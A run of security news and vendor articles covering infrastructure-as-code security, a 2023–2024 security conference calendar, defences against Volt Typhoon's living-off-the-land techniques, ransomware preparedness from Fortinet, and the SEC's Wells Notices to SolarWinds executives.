"From a security perspective, infrastructure as code pushes companies to think about how they can build pre-approved, pre-defined modules that allow them to achieve an outcome. They're not just configuring something within a user interface on the fly--which creates room for human error--they're building a piece of code that can be validated, vetted, and tested to create a baseline security construct." - David Wright, Global Staff Solutions Engineering Lead at HashiCorp

However, if organizations fail to validate their code or they unknowingly introduce a misconfiguration in their IaC module, that error can then be propagated across the entire cloud infrastructure--ultimately creating a wide attack surface.

To combat this risk, companies can leverage tools like Defender for DevOps to create stronger collaboration between security and development teams. This enables security teams to review security hygiene and identify critical IaC misconfigurations, providing clear guidance back to the developers on the severity of the issue and how to remediate it.

As an additional security measure, Microsoft also partners with companies like HashiCorp to create pre-defined IaC modules that align to cybersecurity best practices. This enables organizations to embed security tooling directly into their environment, creating secure, compliant, and easily maintainable cloud deployments.

Cloud computing is only going to continue to grow in popularity as more companies adopt digital ways of working. When used in concert with cybersecurity best practices, IaC is a powerful tool that enables us to equip and defend the next generation of cloud-enabled workers.

To learn more about cloud security and the benefits of IaC, visit Microsoft Security Insider and check out the HashiCorp blog.

There is nothing like attending a face-to-face event for career networking and knowledge gathering, and we don't have to tell you how helpful it can be to get a hands-on demo of a new tool or to have your questions answered by experts.Fortunately, plenty of great conferences are coming up in the months ahead.If keeping abreast of security trends and evolving threats is critical to your job -- and we know it is -- then attending some top-notch security conferences is on your must-do list for 2023 and 2024.

From major events to those that are more narrowly focused, this list from the editors of CSO, will help you find the security conferences that matter the most to you.We'll keep it updated with registration deadlines and new conferences so check back often. While we don't expect this calendar to be comprehensive, we do aim to have it be highly relevant. If there's something we've missed, let us know. You can email your additions, corrections and updates to Michael Nadeau

.June 2023

AppSecCon 2023, Virtual: June 28 – 29

Confidential Computing Summit, San Francisco, California: June 29

Detroit Cybersecurity Conference, Detroit, Michigan: June 29

SecureRhythm 2023, London, UK: June 29

July 2023

SANS Cyber Defence India, TBD, July 3 – 8

SANS London, Virtual and London, UK: July 3 – 8

SANS Cyber Defence Singapore, Singapore: July 3 – 15

Identity Management DACH 2023 Q3, Frankfurt, Germany: July 6

BSides Milano, Milano, Italy: July 8

SANS Amsterdam, Virtual and Amsterdam, Netherlands: July 10 – 15

SANS Cyber Defence Korea 2023, Seoul, South Korea: July 10 – 15

SANSFIRE Washington, DC 2023, Virtual and Washington, DC: July 10 – 15

Singapore Summit: Cybersecurity Conference, Singapore: July 11

Orange County CyberSecurity Conference, Virtual and TBD: July 12

Philadelphia Cybersecurity Conference, Philadelphia, Pennsylvania: July 13

Cybersecurity Roadshow Central America, Virtual: July 14

BSidesCDMX, Mexico City, Mexico: July 14

SANS Cloud Security — San Francisco 2023, Virtual and San Francisco, California: July 17 – 22

SANS Pen Test Hackfest Europe 2023, Virtual and Berlin, Germany: July 17 – 22

Healthcare Summit, TBD: July 18

2023 Northeast Virtual Cybersecurity Summit, Virtual: July 20

BSidesBasingstoke, Basingstoke, UK: July 21

BSidesPGH, Pittsburgh, Pennsylvania: July 21

BSidesJaipur, Jaipur, India: July 22

SANS New York City 2023, Virtual and New York, New York: July 24 – 29

Gartner Security & Risk Management Summit, Tokyo, Japan: July 26 – 28

2023 CSO Global Cyber ​​Security Conference, Shanghai, China: July 27

IDC Cybersecurity Roadshow Mexico, Virtual and TBD: July 27

Tampa CyberSecurity Conference, Virtual and Tampa, Florida: July 27

Gartner Security & Risk Management Summit, Tokyo, Japan: July 27 – 28

BSidesTLV, Tel Aviv, Israel: July 29

SANS Los Angeles 2023, Virtual and Los Angeles, California: July 31 – August 5

August 2023

DFIR Summit & Training 2023, Virtual and Austin, Texas: August 3 – 10

Ringzer0 Zer0 Gravity 2023, Las Vegas, Nevada: August 5 – 8

Black Hat USA 2023, Las Vegas, Nevada: August 5 – 10

SANS London, Virtual and London, UK: August 7 – 12

SANS Nashville, Virtual and Nashville, Tennessee: August 7 – 12

SANS New Delhi, Virtual and TBD: August 7 – 12

BSidesLV, Las Vegas, Nevada: August 8 – 9

Indianapolis CyberSecurity Conference, Virtual and Indianapolis, Indiana: August 10

Vancouver Cybersecurity Conference, Vancouver, Washington: August 10

BSidesTucson, Tucson, Arizona: August 11 – 12

AcceleRise, Denver, Colorado: August 14 – 16

SANS Amsterdam, Virtual and Amsterdam, Netherlands: August 14 – 19

SANS Chicago, Virtual and Chicago, Illinois: August 14 – 19

SANS Melbourne Australia 2023, Virtual and Melbourne, Australia: August 14 – 19

IDC Security Roadshow, Johannesburg, South Africa: August 17

BSidesPerth, Perth, Australia: August 19

SANS Riyadh Cyber Leaders 2023, Riyadh, Saudi Arabia: August 20 – 24

Hack In The Box Security Conference, Virtual and Phuket, Thailand: August 21 – 25

SANS Security Awareness Summit & Training, Virtual and Las Vegas, Neveda: August 21 – 25

SANS Cyber Defence Singapore, Virtual and Singapore: August 21 – 26

SANS Virginia Beach, Virtual and Virginia Beach, Virginia: August 21 – September 1

Salt Lake City CyberSecurity Conference, Virtual and Salt Lake City, Utah: August 23

SecureWorld Manufacturing, Virtual: August 23

Cybersecurity Summit: New Delhi, New Delhi, India: August 23 – 24

IDC Cybersecurity Roadshow Brazil, Virtual and TBD: August 24

Raleigh Cybersecurity Conference, Raleigh, North Carolina: August 24

Blue Team Con, Chicago, Illinois: August 25 – 27

SANS Copenhagen, Copenhagen, Denmark: August 28 – September 2

September 2023

BSidesKrakow, Krakow, Poland: September 2

SANS Cloud Security London, Virtual and London, UK: September 4 – 9

SANS Spring Australia 2023, Virtual and Sydney, Australia: September 4 – 16

IDC Security Forum, Zurich, Switzerland: September 6

SANS Network Security Las Vegas 2023, Virtual and Las Vegas, Nevada: September 6 – 11

Charlotte CyberSecurity Conference, Virtual and Charlotte, North Carolina: September 7

BSidesColumbus, Columbus, Ohio: September 7 – 8

APAC DFIR Summit & Japan, Virtual and Tokyo, Japan: September 7 – 16

BSidesAlbuquerque, Albuquerque, New Mexico: September 8 – 9

BSidesMelbourne, Melbourne, Australia, September 8 – 10

BSidesNoVA, Arlington, Virginia: September 9

BSidesZH, Zurich, Switzerland: September 9

Global Security Exchange (GSX), Dallas, Texas: September 11 -13

SANS Stay Sharp, Virtual: September 11 – 15

SANS Brussels, Virtual and Brussels, Belgium: September 11 – 16

IDC Security Forum, Frankfurt, Germany: September 12

Copenhagen CyberCrime Conference 2023, Virtual and Copenhagen, Denmark: September 12 – 13

St. Louis Cybersecurity Conference, St. Louis, Missouri: September 14

BSidesFrankfurt, Frankfurt, Germany: September 15

BSidesStPete, St. Petersburg, Florida: September 15 – 16

BSidesMTL, Montreal, Canada: September 16

SANS Doha, Doha, Qatar: September 16 – 21

Mandiant Worldwide Information Security Exchange (mWISE), Washington, DC: September 18 – 20

SANS Human Risk Oslo, Oslo, Norway: September 18 – 20

SECtember 2023, Bellevue, Washington: September 18 – 22

SANS Indonesia, Jakarta, Indonesia: September 18 – 23

SANS Maryland – Rockville 2023, Virtual and Rockville, Maryland: September 18 – 23

SANS Rome, Rome, Italy: September 18 – 23

SANS Secure Brasil 2023, Virtual and Sao Paulo, Brasil: September 18 – 23

SANS Paris, Virtual and Paris, France: September 18 – 30

BSidesBelfast, Belfast, Northern Ireland: September 19

IDC Security Forum, Helsinki, Finland: September 19

IDC Security Summit, Istanbul, Turkiye: September 19

London Summit, London, UK: September 19

SecureWorld Denver, Denver, Colorado: September 19

IDC Security Forum, Oslo, Norway: September 20

IDC Security Roadshow, Cairo, Egypt: September 20

International Cryptographic Module Conference (ICMC) 2023, Ottawa, Canada: September 20 – 22

BSidesOslo, Oslo, Norway: September 21

BSides Talinn, Talinn, Estonia: September 21

Des Moines CyberSecurity Conference, Virtual and Des Moines, Iowa: September 21

IDC Security Forum, Stockholm, Sweden: September 21

BSidesTirana, Tirana, Albania: September 21 – 22

BSidesRDU, Raleigh/Durham, North Carolina: September 22

BSidesSG, Singapore: September 22

SANS OSINT Summit 2023, Virtual: September 22

BSidesIdahoFalls, Idaho Falls, Idaho: September 22 – 23

BSidesCambridge, Cambridge, UK: September 23

InfoSec World, Buena Vista, Florida: September 25 – 27

SANS Bucharest, Bucharest, Romania: September 25 – 30

SANS ICS Security Houston 2023, Virtual and Houston, Texas: September 25 – 30

SANS Managing Security Risk 2023, Virtual: September 25 – 30

SANS Seattle 2023, Virtual and Seattle, Washington: September 25 – 30

IDC Security Forum, Vienna, Austria: September 26

IDC Security Forum, Nieuwegein, Netherlands: September 26

International Cyber Expo 2023, London, UK: September 26 – 27

Gartner Security & Risk Management Summit, London, UK: September 26 – 28

Relativity Fest, Chicago, Illinois: September 26 – 28

IDC Security Forum, Antwerp, Belgium: September 27

IDC Security Forum, Copenhagen, Denmark: September 28

IDC Security Roadshow Chile, Virtual and TBD: September 28

Seattle Cybersecurity Conference, Seattle, Washington: September 28

SecureWorld Detroit, Detroit, Michigan: September 28

BSidesCanberra, Canberra, Australia: September 28-30

October 2023

SANS DFIR Europe Summit & Training 2023, Virtual and Prague, Czech Republic: October 1 – 7

*CSO50 Conference + Awards, Fort McDowell, Arizona: October 2 – 4

SANS Executive Leadership Training 2023, Dulles, Virginia: October 2 – 6

SANS Amsterdam, Virtual and Amsterdam, Netherlands: October 2 – 7

SANS October Singapore 2023, Virtual and Singapore: October 2 – 14

Identity Week, Washingon, DC: October 3 – 4

ONE Conference, The Hague, Netherlands: October 3 – 4

Graylog GO 2023, Virtual and Houston, Texas: October 3 – 5

Cybersecurity Summit: Africa, Virtual: October 4

Identity Management Europe 2023 Q4, Utrecht, Netherlands: October 4

BSidesAhmedabad, Ahmedabad, India: October 4 – 6

Columbus CyberSecurity Conference, Virtual and Columbus, Ohio: October 5

Blockchain Security Summit 2023, Virtual: October 5 – 6

BSidesKC, Kansas City, Missouri: October 6 – 7

BSidesPDX, Portland, Oregon: October 6 – 7

BSidesAugusta, Augusta, Georgia: October 7

BSidesColoradoSprings, Colorado Springs, Colorado: October 7 – 8

SANS Cyber Safari 2023, Virtual and Riyadh, Saudi Arabia: October 7 – 19

SANS Baltimore, Virtual and Baltimore, Maryland: October 9 – 14

SANS Brisbane Australia 2023, Brisbane, Australia: October 9 – 14

SANS Istanbul Offensive Operations 2023, Virtual and Istanbul, Turkiye: October 9 – 14

SANS London, Virtual and London, UK: October 9 – 14

SANS Nantes, Nantes, France: October 9 – 14

SANS San Francisco, Virtual and San Francisco, California: October 9 – 14

SANS India Cloud Security 2023, Virtual: October 9 – 21

it-sa, Nuremberg, Germany: October 10 – 12

Chicago Cybersecurity Conference, Chicago, Illinois: October 12

HOU.SEC.CON 2023, Houston, Texas: October 12 – 13

BSidesBloomington, Bloomington, Minnesota: October 13 – 14

BSidesJAX, Jacksonville, Florida: October 13 – 14

BSidesCambridgeMA, Cambridge, Massachusetts: October 14

BSidesSTL, St. Louis, Missouri: October 14

BSidesMunich, Munich, Germany: October 14 – 15

Rhythm World 23, Denver, Colorado: October 16 – 18

SANS Secure Africa 2023, Virtual and Casablanca, Morocco: October 16 – 21

CloudSecNext Summit & Training 2023, Virtual and Dallas, Texas: October 16 – 23

SANS Munich, Virtual and Munich, Germany: October 16 – 28

SANS Tokyo Autumn 2023, Virtual and Tokyo, Japan: October 16 – 28

Financial Services Summit, New York, New York: October 17

Securing New Ground (SNG), New York, New York: October 17 – 18

San Diego CyberSecurity Conference, San Diego, California: October 18

SecureWorld St. Louis, St. Louis, Missouri: October 19

SANS Manchester, Manchester, UK: October 23 – 28

SecTor, Toronto, Canada: October 23 – 26

SANS Rocky Mountain Fall 2023, Virtual and Denver, Colorado: October 23 – 28

LASCON 2023, Austin, Texas: October 24 – 27

SecureWorld Government, Virtual: October 25

(ISC)? Security Congress 2023, Virtual and Nashville, Tennessee: October 25 – 27

IDC Cybersecurity Roadshow Columbia, TBD: October 26

IDC Security, Warsaw, Poland: October 26

IDC Security & Cloud Roadshow, Porto, Portugal: October 26

SecureWorld Dallas, Dallas, Texas: October 26

Toronto Cybersecurity Conference, Toronto, Canada: October 26

BSidesOttawa: Ottawa, Ontario: October 26 – 27

IDC Security Forum: Security Strategy 2023, Virtual and Warsaw, Poland: October 26

BSidesBirmingham, Birmingham, UK: October 28

BSidesGVL, Greenville, South Carolina: October 28

BSidesPeoria, Peoria, Illinois: October 28

SANS Dublin, Dublin, Ireland: October 30 – November 4

SANS Orlando, Virtual and Orlando, Florida: October 30 – November 4

* This event is presented by Foundry, the parent company of CSO.

November 2023

*CSO’s Future of Cybersecurity Summit, TBD: TBD

Cybersecurity Summit: Mumbai, Mumbai, India: November 1 – 2Info

2023 Canada Virtual Cybersecurity Summit, Virtual: November 2

Phoenix CyberSecurity Conference, Virtual and Phoenix, Arizona: November 2

SANS Gulf Region 2023, Dubai, UAE: November 4 – 23

SANS Korea, Virtual and Seoul, South Korea: November 6 – 11

SANS London, Virtual and London, UK: November 6 – 11

SANS San Diego Fall 2023, Virtual and San Diego, California: November 6 – 11

SANS Stockholm, Stockholm, Sweden: November 6 – 11

SANS Offensive Operations Australia 2023, Virtual and Canberra, Australia: November 6 – 18

Identity Management UK 2023 Q4, London, UK: November 8

SecureWorld Seattle, Seattle, Washington: November 8 – 9

DC/Baltimore Cybersecurity Conference, TBD: November 9

BSidesChicago, Chicago, Illinois: November 10

BSidesKBH, Copenhagen, Denmark: November 11

IDC European CISO Exchange, Marbella, Spain: November 12 – 14

SANS Stay Sharp, Virtual: November 13 – 15

Tanium Converge, Austin, Texas: November 13 – 16

SANS Japan, Virtual and Tokyo, Japan: November 13 – 18

SANS Lisbon, Lisbon, Portugal: November 13 – 18

Identity Management Nordics 2023 Q4, Stockholm, Sweden: November 14

Black Hat Middle East and Africa, Riyadh, Saudi Arabia: November 14 – 16

ISC East, New York City, New York: November 14 – 16

Aspen Cyber Summit, New York City, New York: November 15

Nashville CyberSecurity Conference, Virtual and Nashville, Tennessee: November 15

Mexico City Cybersecurity Conference, Mexico City, Mexico: November 16

BSidesCalgary, Calgary, Canada: November 16 – 17

HackFest Summit 2023, Hollywood, California: November 16 – 17

BSidesIndore, Indore, India: November 17 – 18

BSidesBerlin, Berlin, Germany: November 18

SANS Amsterdam, Virtual and Amsterdam, Netherlands: November 20 – 25

SANS Austin, Virtual and Austin, Texas: November 27 – December 2

SANS Geneva, Geneva, Switzerland: November 27 – December 2

SANS India Autumn 2023, Virtual: November 27 – December 2

SANS Paris, Virtual and Paris, France: November 27 – December 2

Atlanta Cybersecurity Conference, Atlanta, Georgia: November 30

Boston CyberSecurity Conference, Virtual and Boston, Massachusetts: November 30

*CSO 30 Awards UK, London, UK: November 30

*CSO Security Summit US, London, UK: November 30

* This event is presented by Foundry, the parent company of CSO.

December 2023

BSidesOdisha, Odisha, India: December 2

Black Hat Europe, London, UK: December 4 – 7

SANS London, Virtual and London, UK: December 4 – 9

SANS Phoenix-Tempe 2023, Virtual and Tempe, Arizona: December 4 – 9

SANS Tokyo Winter 2023, Virtual and Tokyo, Japan: December 4 – 9

Atlanta CyberSecurity Conference, Virtual and Atlanta, Georgia: December 6

Dallas Cybersecurity Conference, Dallas, Texas: December 7

BSidesLondon, London, UK: December 9

SANS Jeddah Defence 2023, Virtual and Jeddah, Saudi Arabia: December 9 – 14

SANS Cyber Defense Initiative 2023, Virtual and Washington, DC: December 11 – 16

SANS Frankfurt, Virtual and Frankfurt, Germany: December 11 – 16

Houston CyberSecurity Conference, Virtual and Houston, Texas: December 13

January 2024

SANS London, Virtual and London, UK: January 8 – 13

SANS Brussels, Virtual and Brussels, Belgium: January 15 – 20

SANS Copenhagen, Copenhagen, Denmark: January 15 – 20

SANS Amsterdam, Virtual and Amsterdam, Netherlands: January 22 – 27

SANS Paris, Virtual and Paris, France: January 29 – February 3

February 2024

SANS Offensive Operations London 2024, Virtual and London, UK: February 5 – 10

SANS Amsterdam, Virtual and Amsterdam, Netherlands: February 12 – 17

SANS Munich, Virtual and Munich, Germany: February 19 – 24

SANS Security East New Orleans 2024, Virtual and New Orleans, Louisiana: February 19 – 24

Gartner Security & Risk Management Summit, Mumbai, India: February 26 – 27

SANS Madrid, Madrid, Spain: February 26 – March 2

March 2024

Gartner Identity & Access Management Summit, London, UK: March 4 – 5

SANS Orlando 2024, Virtual and Orlando, Florida: March 24 – 29

April 2024

BSidesMilwaukee, Milwaukee, Wisconsin: April 3

ISC West, Las Vegas, Nevada: April 9 – 12

May 2024

RSA Conference, San Francisco, California: May 6 – 9

SANS Security West San Diego 2024, Virtual and San Diego, California: May 9 – 14

BSidesVitoria, Vitoria, Brasil: May 18

December 2024

Gartner Identity & Access Management Summit, Grapevine, Texas: December 9 – 11

In May, a joint advisory from an international group of cybersecurity authorities indicated that a cyber actor known as Volt Typhoon was using a particularly pernicious technique called "living off the land" that employed code and tools already existing in the Microsoft operating system to attack victim organizations.

Living-off-the-land attacks are hard -- but not impossible -- to defend against. Because they exploit legitimate tools, they can often linger in networks, carrying out all sorts of malicious tasks for a long time before being discovered.

Fortunately, protection from such attacks can often be accomplished without employing additional software, tools, or third-party security software. Unfortunately, it often comes down to the one thing we frequently have little of: time to test on workstations and servers to determine the actual impact on our network.

This is yet another situation in which an ounce of prevention is worth a pound of cure. In the advisory, the coalition indicated that the attackers used wmic, ntdsutil, netsh, and PowerShell, among other tools, to gain access and launch attacks. The advisory recommended several actions to help proactively mitigate living-off-the-land attacks, including ensuring that firewall egress logs are thoroughly reviewed.

While that's sound advice, in today's environment very few networks are set up with a single exit point that would allow us to review everything that goes out of our networks. Thus, we need to think of other ways we can protect and defend from hidden attackers that may be hard to detect.

Attackers want to blend into the background

Microsoft has noted that the attackers’ goal is to blend into the background, using command line commands to collect data, grab credentials from local and network systems, and place them into archive file types so that the information can be exported for later use. Stolen credentials are then used to set up and maintain persistence in the network, disguised as normal traffic in the enterprise.

It pays to closely monitor how firewalls and edge devices are set up. Volt Typhoon attackers would gain access primarily to Fortinet firewall appliances to gain access to additional credentials. In enterprise firewalls, active directory credentials are typically used to authenticate and provide tracking in the interface. It's unclear at this time exactly how the attackers were able to glean the credentials from firewalls, but once they gained access to them, they could access user roles on the network and from there use various techniques to elevate rights on the network.

Volt Typhoon uses "living off the land" techniques to dump credentials through the Local Security Authority Subsystem Service (LSASS). LSASS provides access hashes for the current user's credentials through the LSASS memory space. The attackers use a process with the actual commands hidden in Base64 commands to obfuscate the attack sequence.

How to protect Windows environments against living-off-the-land attacks

So, what can you do to better protect yourself? Sometimes you can use techniques similar to living off the land to better project a network. Those in the process of migrating to Windows 11 should proactively review additional protections of LSASS that are included in Windows 10 and Windows 11. Windows 11 -- in particular, new, enterprise-joined Windows 11 (22H2 update) installs -- has Protective Process Light enabled by default. If you have the appropriate licenses, you can also enable Windows Defender Credential Guard which is enabled if you have the Enterprise edition of Windows 11. LSA protections have impact on some applications so you may need to review and evaluate before deploying this in your network.

Next-use attack surface reduction rules included in every Windows platform are also useful, specifically those allowing users to "Block credential stealing from the Windows local security authority subsystem (lsass.exe)." As Microsoft notes: "This rule helps prevent credential stealing by locking down local security authority subsystem service. LSASS authenticates users who sign in on a Windows computer. Microsoft Defender Credential Guard in Windows normally prevents attempts to extract credentials from LSASS. Some organizations can’t enable Credential Guard on all of their computers because of compatibility issues with custom smartcard drivers or other programs that load into the Local Security Authority (LSA)."

Use Attack Surface Reduction Rules to your advantage

One Attack Surface Reduction (ASR) Rule you'll need to test for the impact on your network is "Block process creations originating from PSExec and WMI commands." You will need to test this rule as some organizations may experience compatibility issues with it on certain server systems, though it should be deployed on other systems to prevent lateral movement originating from PsExec and WMI.

Finally, you should enable the rule "Block execution of potentially obfuscated scripts," though it is important to note that the rule is currently not as effective as it once was. Microsoft has indicated that "PowerShell scripts have been temporarily excluded from the 'Block execution of potentially obfuscated scripts' rule due to a high number of false positives. We will provide an update when PowerShell scripts are included again in the scope of this rule."

You'll also want to enable multifactor authentication (MFA) to ensure that only those individuals gain access to key assets or workstations as you see fit. If budget constraints are an issue or older technologies in your network restrict your use of two-factor options, you can prioritize your protection effects to protect administrative credentials first and foremost.

Learning more about living-off-the-land attacks

Living-off-the-land attacks are not new and are tracked by many websites, but they remain stubbornly difficult to identify and defend against, given that they come from a Microsoft-signed file, either native to the OS or downloaded from Microsoft. These living-off-the-land attacks typically use files or scripts that have an extra "unexpected" functionality. In the listing on the Github website, you can see all the files and scripts that can be potentially used. Often applications that are used for normal functions such as updating are used by attackers because the traffic and CPU overhead triggered by these applications can be hidden or ignored. Case in point is the application Bitsadmin.exe or BITS. Used as a background Windows update tool, it can also be used by attackers to move data in and out of the network. For example, attackers have used BITS to download remote payloads, maintain persistence on host machines, and cover their tracks by deleting malicious code after the code has been run. You can block bitsadmin by customizing exploit protection by blocking Disable Win32k system calls, but as always, test before recommending deployment.

Even though ransomware has existed for decades, this ever-evolving threat continues to be extremely effective, and it's not going away anytime soon. According to data from our latest Fortinet 2023 Global Ransomware Report, two-thirds of organizations were targeted by ransomware and 50% of them fell victim to an attack. And data from our FortiGuard Labs 2H 2022 Threat Landscape Report indicates that the volume of ransomware attacks grew by 16% compared to the previous six-month period.

Although these statistics are unsettling, they aren't surprising. With ransomware-as-a-Service (RaaS), even novice cybercriminals can easily launch sophisticated attacks and receive a quick payout if they're successful.

Organizations need to be as tactically efficient as their adversaries, so it's critical to have a complete picture of your current ability to effectively prevent, rapidly detect and comprehensively respond to a ransomware attack. In the fight against ransomware, organizations can and should assess and prioritize their technology, processes, and people.

Use technology to prevent ransomware

Make sure you have the right tools in place, and that their core technologies have continued to improve to match the latest threat actor techniques. According to a 2023 Global Ransomware Survey, the seven most-cited technologies (each viewed as important to ransomware protection by at least half of respondents) are Internet-of-Things (IoT) protection, next-generation firewalls (NGFWs), secure access service edge (SASE) solutions, cloud workload protection (CWP), endpoint detection and response (EDR), zero-trust network access (ZTNA) principles, policies, and tools, and secure email gateways (SEGs).

Security teams should also have secure backup procedures and solutions that ransomware attacks can't compromise. Both must be regularly tested to ensure that data can be recovered as rapidly and reliably as possible.

Update processes to prioritize ransomware

Similarly, every organization should create, maintain, and periodically test and update an incident response (IR) plan. (In the 2023 Global Ransomware Survey, better people and processes were among respondents' top three priorities.)  Make sure your plan includes specific information on countering a ransomware threat. This is another area where you can consider enlisting expert third-party assistance. Vendors like Fortinet can give you an objective evaluation and provide guidance and recommendations for improving your organization's plan.

Ransomware should be a top concern of everyone from C-level executives and the board of directors. Make sure there is two-way communication with the C-suite and board of directors on cybersecurity-related topics and ensure that leadership is included in your IR plan, particularly in the escalation and crisis decision-making areas.

Train people to reduce risks

You shouldn't be doing on-the-job training in the middle of a ransomware incident. Security teams need to effectively learn how to mitigate and respond to a ransomware threat before it happens. To educate and prepare teams, consider doing tabletop exercises that are specifically designed for ransomware scenarios. Training is available through the SANS Institute, Information Systems Audit and Control Association (ISACA), Cloud Security Alliance, and other associations or organizations. Also, encourage your staff to take advantage of free training provided by vendors like Fortinet on key cybersecurity topics.

Training shouldn't be only for security teams. When it comes to security, everyone throughout the organization has a role to play. Get serious about security awareness training and determine whether it's effective in changing employee behavior. Are your existing security awareness training programs just about checking a compliance or regulatory box? Or is it truly working to change employee behavior and reduce risk?

With increases in ransomware as a service and AI-enabled attacks, every employee needs to be more knowledgeable than ever to be able to spot and avoid threats. Consider educating and testing employees on these areas:

• Cybersecurity principles and why cybersecurity is so important
• Psychological approaches fraudsters and attackers use, such as bias, urgency, and social engineering
• Psychological principles employees should use when faced with potential threats, such as thinking the scenario through before acting or considering the context of the situation
• Current, real-world examples of threats perpetrated against employees
• How threat actors may use a multi-channel approach when targeting employees
• How AI is being used by threat actors and changing the caliber of threats

If you aren't already, consider testing employees based on real-world attacks and scenarios that include social engineering. Testing through phishing, vishing, and smishing simulations can help employees recognize even complex and convincing threats.

Changing behavior is difficult, but cyber knowledge is more crucial than ever.

Ransomware is rampant, but help is available

Although ransomware presents tremendous risks, by prioritizing technology, processes, and people, you can reduce the likelihood of losing sensitive data and significant disruption of your operations from an attack. If necessary, you can engage expert help from third-party advisors like Fortinet for an independent assessment of your current readiness. Look at staffing levels and your existing expertise to make sure your teams have the right staff members and skill sets to mitigate a ransomware incident effectively.

By working with a vendor like Fortinet that delivers both cybersecurity technology and services, you can address your cybersecurity risks. Fortinet solutions are powered by machine learning and AI, and our Security Fabric integrates prevention, detection, and response capabilities to protect your enterprise against ransomware attacks throughout the entire life cycle of cyber kill chain; wherever your organization is most exposed. Fortinet services can help you assess operational readiness and train your team members so they can effectively respond in the event of a ransomware incident.

Find out how the Fortinet Security Fabric platform delivers broad, integrated, and automated protection across an organization's entire digital attack surface to deliver consistent security across all networks, endpoints, and clouds.

The US Securities and Exchange Commission has roiled the cybersecurity industry by putting executives of SolarWind on notice that it may pursue legal action for violations of federal law in connection with their response to the 2020 attack on the company’s infrastructure that affected thousands of customers in government agencies and companies globally.

Current and former employees and officers of the company, including the chief financial officer (CFO) and chief information security officer (CISO), have received so-called Wells Notices notices from the SEC staff, in connection with the investigation of the 2020 cyberattack, the company said in an SEC filing. 

"The Wells Notices provided to these individuals each state that the SEC staff has made a preliminary determination to recommend that the SEC file a civil enforcement action against the recipients alleging violations of certain provisions of the U.S. federal securities laws," SolarWinds said in its filing. 

A Wells Notice is neither a formal charge of wrongdoing nor a final determination that the recipient has violated any law, SolarWinds noted. However, if the SEC does pursue legal action and prevails in a lawsuit, there could be various consequences.

“If the SEC were to authorize an action against any of these individuals, it could seek an order enjoining such individuals from engaging in future violations of provisions of the federal securities laws subject to the action, imposing civil monetary penalties and/or a bar from serving as an officer or director of a public company and providing for other equitable relief within the SEC's authority,” Solarwinds said in its filing.

SolarWinds sells a network and applications monitoring platform called Orion, which was hit by a threat actor widely believed to be affiliated with Russia, and used to distribute Trojanized updates to the software’s users.

The SEC also sent a Wells Notice to the company itself last year. In that notice, the SEC alleged “violations of certain provisions of the U.S. federal securities laws with respect to our cybersecurity disclosures and public statements, as well as our internal controls and disclosure controls and procedures,” according to SolarWinds’ latest quarterly financial report. Action on that notice is pending, according to SolarWinds.

SolarWinds to defend itself 

SolarWinds CEO Sudhakar Ramakrishna sent an email to employees stating that despite their extraordinary measures to cooperate with and inform the SEC, the agency continues to take positions that SolarWinds do not believe match the facts.

“We will continue to explore a potential resolution of this matter before the SEC makes any final decision. And if the SEC does ultimately decide to initiate any legal action, we intend to vigorously defend ourselves," Ramakrishna wrote in the email, which the company has sent to news organizations. 

SEC move could mean more liability for CISOs

Meanwhile, cybersecurity professionals noted that it is unusual for a Wells Notice to be sent to a CISO, and the move by the SEC could signal a whole new set of potential liabilities for cybersecurity professionals.  

"Usually, a Wells Notice names a CEO or CFO for issues such as Ponzi schemes, accounting fraud or market manipulation, but those are unlikely to apply to a CISO,"  Jamil Farshchi, CISO at Equifax, said in a LinkedIn post, adding that one violation that a CISO might be in the position to commit is a failure to disclose material information. 

"Things like failing to disclose the gravity of an incident … or failing to do so in a timely manner, could conceivably fall into this category," Farshchi said in the post. 

The move by the SEC will make CSOs more individually accountable for cybersecurity, said Agnidipta Sarkar, a former CISO of pharmaceuticals company Biocon.

"Though it doesn’t mean that the CISO has been charged, it is a new milestone. From today onwards, CISOs will increasingly be made accountable for the decisions they take or did not take," Sarkar said. 

However, attributing blame solely to the CISO or CFO might not always be fair or accurate, said Ruby Mishra, CISO at KPMG India.

"In order to manage cybersecurity effectively, the organization adopts a multilayered approach involving various stakeholders and departments. Holding the CISO or CFO solely responsible for a cyberattack may overlook the collective responsibility," Mishra said. 

Mishra noted that it is difficult for individuals or organizations to prevent all cyberattacks due to sophisticated techniques and rapidly changing threat landscapes. 

"Before issuing the notice, the SEC may have considered a variety of factors, including specific circumstances, and legal frameworks, or may have demonstrated negligence if CISO failed to implement adequate security measures, neglected SEC policies, guidelines, and practices, or ignored known vulnerabilities," Mishra said. 

On its part, SolarWinds said in a statement sent to media outlets that “Sunburst,” its name for the breach, “was a highly sophisticated and unforeseeable attack that the U.S. government has said was carried out by a global superpower using novel techniques in a new type of threat that cybersecurity experts had never seen before.”

It also noted that legal action against SolarWinds and its employees could have a “chilling” effect on breach disclosures. “The only possible way to prevent sophisticated and widespread nation-state attacks such as Sunburst is through public-private partnerships with the government,” the company said.